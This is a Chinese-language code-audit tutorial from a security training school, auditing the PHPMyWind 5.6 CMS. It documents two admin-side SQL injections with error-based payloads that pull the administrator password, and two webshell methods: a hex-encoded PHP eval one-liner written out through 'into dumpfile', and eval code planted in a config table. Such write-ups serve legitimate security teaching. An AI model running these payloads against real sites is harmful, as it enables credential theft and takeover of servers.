0×00 前言
大家好,我是掌控安全学院的聂风,在此,我做一个代码审计的文章分享来方便同学们学习。这次我们选中的是一个PHPMyWind这个CMS进行审计,PHPMyWind是一个老牌CMS,PHPMyWind 从2010年开发至今,按官网宣传有15万次下载量,他的安全性也在不断的提高。这里记录下审计过程和一些小思路和总结下我审计时发现的问题。
0×01 环境搭建
Phpstudy
PHPMyWind 5.6(http://phpmywind.com/downloads/PHPMyWind_5.6.zip)
代码审计工具(Seay源代码审计系统)
0×02 代码审计过程
我们拥有了一个CMS的源码,其实我们可以先不用着急先去看看这个CMS以前报过的漏洞,这个CMS比较老牌,稍微一查,就在乌云知识库发现了很多信息。
然后我们先看看这里漏洞为什么产生,究竟为什么,然后往那个方面思考。然后我们再去将源码就先放入根目录访问开始安装吧!安装好之后我们查看index.php文件,开头第一行就是文件包含,包含/include/config.inc.php这个文件,这个文件包含了好几个文件
我们着重来看看common.inc.php,这个文件就是帮助我们上面触发漏洞的文件,后面两个什么*.classs.php应该是定义类和函数的,可以先不看。
common.inc.php第一开始先定义一些常量,然后定义一个函数_RunMagicQuotes,这个函数实际上就是魔术引号的作用。
再看下面45-58行,这看着感觉很像$$的变量覆盖漏洞,实际上这里时一个方便开发的机制,可以让我们的传参全部都变成变量使用,例如我传参a=123。
那么经过这个处理就变为了$a = 123
这里记住,我们可以定义变量了,我通过全局搜索查询了下,调用这个文件都是文件的开头为主,然后这个文件中被调用的参数大部分都会先初始化参数,然后处理再进行调用。
然后代码又包含了三个文件
三个文件做什么的看开发贴心的注释就知道了,要是变量覆盖这个在包含common.func.php下面就可以飞起了。这三个文件可以先不看,一个是常用函数,一个是各种配置变量定义,还有一个就是连接数据库的文件。之后就是设置了一些路径之类的变量
然后我们还是回来看index.php,整页就没什么有用的地方了。各种输出都是读取了数据库里面的数据然后输出。然后还包含了两个文件,header.php|footer.php。然后读取这几个PHP然后再去按照功能和模块去读取每个文件就行了。
那么根据我们的信息收集,我们知道了这款CMS,他以前爆过的SQL注入就是因为没用初始化变量SQL,然后直接想办法跳过这个变量SQL的赋值,然后造成直接传参SQL语句直接执行造成SQL注入,详情可以见乌云知识库找,这里就不方便贴链接了
那么我们根据这个思想去找漏洞就很简单,找没有初始化过的传参
开胃菜:
SQL注入一:
打开admin目录下面的info_update.php文件
我们发现第55行有一个变量id,这个地方如果我们能够控制变量id,那么我们可能就可以对这个CMS进行SQL注入,并且这个变量id都没有被单双引号包裹,那么如果存在注入,我们都不需要去考虑魔术引号带来的烦恼。
然后这个文件的第57-59行,就是没有初始化这个$id,而且$id的执行语句在初始化之前,算是被我捡到一只漏网之鱼了。
但是我这个info_update.php并没有初始化参数,那么我们就可以控制$id的值,那么我们就可以进行SQL注入了。我们再来追踪一下GetOne函数究竟干了什么?
看到include目录下面的mysqli.class.php文件的第262-294行
SetQuery函数是替换表名的前缀,然后Execute才是真的执行语句函数,然后们追踪这个函数,他的定义在mysql.class.php这个文件的第165-191行
很明显这的第191行是执行,但是这里很明显要过一个CheckSql的检测。
这个函数在这个文件的522行被定义。
这个很明显是80sec的过滤。那么我们可以直接使用语句绕过,毕竟这个过滤也很老了,虽然这里有改动,因为过滤问题这里的SQLmap无法跑出Sql注入,百度下找到一个绕过的80sec语句妥妥的就绕过了。
注入的数据包
GET /admin/info_update.php?id=1 HTTP/1.1
Host: 192.168.32.136
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7s67quel3o522u240qquhlpo32
Connection: close
然后构建的语句是:
AND id in (char(@`'`), extractvalue(1, concat_ws(0x20, 0x5c,(select password from pmw_admin limit 0,1))),char(@`'`))
直接拼接在id传参的后面可以直接通过报错注入显示超管的密码。如果要账号就改子查询里面的语句
然后通过这个方法,我发现了这个CMS在书写的时候很多地方他差不多功能模块的核心代码就不会变。然后我这里指出的这个SQL注入这代码属于核心代码。只要后台文件名为
***_update.php都存在这个问题。涉及的文件特别多。好多文件都中招
SQL注入二:
后面发现的这个SQL注入也是和这个差不多,也属于可以好多文件中招
我们先进行代码分析吧,打开admin目录下面的soft_save.php文件
我们发现第22行有一个函数,我们来看看这个函数干了什么~
这个函数的定义在admin_func.php这个文件的第1315-1417行。
这里定义的这个函数,第一个传参是cid,然后因为我的登陆的账号并不是超管,所以执行了第43行的语句,很明显,这个函数直接将cid拼凑进了SQL语句,那么这个地方如果我们能够控制变量cid,那么我们可能就可以对这个CMS进行SQL注入,并且这个变量cid都没有被单双引号包裹,那么如果存在注入,我们都不需要去考虑魔术引号带来的烦恼。那么我们看看这个$cid是由什么控制的,是由函数调用时的传参,那么就是soft_save.php第22行的变量classid。
然而很明显这个$classid没用进行初始化,并且在第二次初始化前就先执行了!!!
然后拿出我写的第一个SQL注入语句轻松拿下。
我来说下怎么注入吧,访问后台的软件下载管理
然后点击右下角的添加软件信息
然后将带*号的栏目填上数据,因为有前端检测。
然后添加,抓包就行,然后将我语句的Payload 加在classid传参就行
AND model in (char(@`'`), extractvalue(1, concat_ws(0x20, 0x5c,(select password from phpmywind_db.pmw_admin limit 0,1))),char(@`'`))
可以直接通过报错注入显示超管的密码。如果要账号就改子查询里面的语句
然后我们会发现这里实际上是调用了IsCategoryPriv函数传参所没有初始化并且拼接进的SQL语句没用使用引号包含造成的SQL注入。使用了这个函数,然后传参没用初始化的文件也有好多。
正餐:
后台SQL注入似乎危害不够,进了后台不应该是想着Getshell吗?
那我们来看看我找到的Getshell方法。
Getshell 一(通过into_dumpfile):
admin/database_backup.php这个文件的第43行出现的一个switch,于是乎action传参决定执行哪个功能。
第238行-269行
这里只拦截了删除语句,以及去除反斜杠还有去空格,没有拦截其他的语句,那么我们再去Execute这个函数看看,这个函数在include/mysqli.class.php的166行被定义
这里有一个安全性检测我们去看下,这个函数还是在这个文件被定义,在523行到结束,这里代码有点长,我就贴核心的一块吧。
他过滤了一些常用的黑客函数,比如Union,sleep,benchmark,load_file,into outfile,但是他过滤还是有疏忽,他想到了过滤into outfile,但是没有过滤into dumpfile,所以只要我们使用into dumpfile就可以直接getshell写入一个webshell,但是写文件有个很大的问题就是需要知道他的绝对路径,那么绝对路径我们该怎么办妮?
我们可以看到4g.php这个文件,4g.php的第41行只要我们传参m=show
就会调用templates/default/mobile/show.php
我们来看看这个文件的第24-49行。
很明显这里24行是通过SELECT * FROM `#@__infoclass` WHERE id = $cid AND checkinfo = ‘true’ ORDER BY orderid ASC去获取$row,我们传参cid他就会去读取
pmw_infoclasee表里面的内容,然后当cid=4的时候,因为49行要输出$row[‘title’]但是获取的参数中没有这个数据,于是乎就抛出了报错。
那么我们就获取了绝对路径,我这个的绝对路径是C:\phpstudy\WWW\
所以我们只要访问http://192.168.32.141//4g.php?m=show&&cid=4,就可以获得绝对路径,然后后台导出吧,为了防止过滤问题,我把导出的一句话写成了16进制。
一句话:<?php @eval($_REQUEST[a]);?>
16进制后:3c3f70687020406576616c28245f524551554553545b615d293b3f3e
于是乎导出语句就是:
select 0x3c3f70687020406576616c28245f524551554553545b615d293b3f3e into dumpfile ‘C:/phpstudy/WWW/shell.php’
直接访问后台页面,然后选择数据库的执行SQL语句就行
点击执行就行了。成功执行
然后成功导出一句话木马,拿到了webshell
Getshell 二(通过修改数据库内容):
查看后台的site_save.php文件。我们看13行-56行这个分支代码,第56行有一个函数我们来看看是什么作用。
这个函数在这个文件的第131行-163行定义。
实际上就是读取数据库里面的#@__webconfig`表的数据,然后进行遍历,然后拼接进$str这个遍历,然后执行Writef这个函数,我先解释以下#@__webconfig`是什么表,实际上#@__ 是代替前缀的,当处理的时候就会按照我安装的时候设定的前缀进行替换,我使用的是默认设置pmw作为表前缀,那么这里读取pmw_webconfig的内容,然后里面有两个if语句,其实看这个$str的阵势都能看出来这里是要写入配置到config.cache.php。
我们先来看这个函数里面的两个if,第一个if他的作用就是判断数据表里面的字段varname如果读出来是cfg_countcode的时候将那条数据的varvalue所对应的值删除反斜杠然后赋值给$row[‘varvalue’]
第二个if就是判断表的vartype字段查出来是不是number,如果不是的话执行
$str .= "\${$row['varname']} = '".str_replace("'",'',$row['varvalue'])."';\r\n”
$row[‘varname’] 这个值是我们表里面查到的字段varname的值
$row[‘varvalue’] 这个值是我们表里面查到的字段varvalue的值
然后str_repalce是替换单引号,怕我使用单引号来跳出这个赋值,然后进行Getshell
那么如果$row[‘varname’]=a
$row['varvalue']=b
这个变量str就变为了
<?php if(!defined('IN_PHPMYWIND')) exit('Request Error!');
$a = 'b';
?>
这里很明显有防范我单引号跳出来造成getshell,我们我们想一下,如果我们能够控制$row[‘varname’]这个值是不是就可以代码执行了,比如这个值为
$row['varname']=a;eval($_REQUEST[a]);//
那么执行就变为了
$a;eval($_REQUEST[a]);//= 'b';
很明显有一句话木马,然后注释了后面,语法也没用问题。那么核心就是两个,第一个是控制这个$row[‘varname’],控制这个字段很明显就是修改数据库里面的内容呗。后台功能里面就提供了一个更新数据库的功能,我只需要执行
update pmw_webconfig set varname = 'a;eval($_REQUEST[a])//' where orderid=97
成功执行,然后我们看看数据库里面
当然我这样看是偷懒了,用后台自带的数据库执行也是可以查看的。
那么我们通过这个方法已经修改掉了varname,那么如果$str真的是写入文件的话我们的
webshell就到手了。
那我们再看看Writef函数是干什么的,这个函数在common.func.php的第364-389行被定义。
很明显,判断如果函数传参$file的目录存在可写就写入,写入的东西就是函数传参的$str。
那么函数传参的$str不就是前面我们拼凑出来的变量str。
所以这里就是写入文件到config.cache.php文件。
万事俱备了,我们改了数据库内容能让恶意语句拼接进去了。那么我们只要触发就行。具体操作也很简单,我们在站点配置管理随便加一个新站点。
随便写就行,然后提交,我们的一句话就被插进去了。
然后我们只要传参a就行
成功Getshell
0×03 总结
其实该CMS所存在的漏洞不仅仅只有这些,我文章中的这些也只是一个抛砖引玉,只是为了阐述通读全文的审计方法,如果我文章中有什么写的可以再改进的地方,可以随时联系我!谢谢大家花费了时间来读在下的粗鄙小文,谢谢大家。
发表评论
您还未登录,请先登录。
登录